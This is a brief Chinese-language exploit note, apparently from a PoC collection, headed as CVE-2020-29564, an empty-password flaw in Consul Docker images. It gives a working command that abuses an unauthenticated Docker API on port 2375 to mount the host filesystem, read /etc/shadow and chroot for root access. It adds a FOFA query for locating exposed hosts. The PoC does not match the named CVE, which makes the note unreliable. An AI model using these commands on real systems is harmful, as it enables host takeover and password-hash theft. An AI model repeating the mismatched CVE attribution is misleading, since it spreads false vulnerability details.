CVE-2020-29564 Consul Docker images 空密码登录漏洞
Consul Docker images 0.7.1至1.4.2版本部署的Consul Docker容器的系统,可能允许远程攻击者使用空白密码来实现root用户访问。
PoC:
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
File Access: cat /mnt/etc/shadow
RCE: chroot /mnt
FOFA:
port="2375" && protocol=="docker"
ref:
- https://forum.ywhack.com/thread-114824-1-2.html
- https://github.com/koharin/koharin2/blob/main/CVE-2020-29564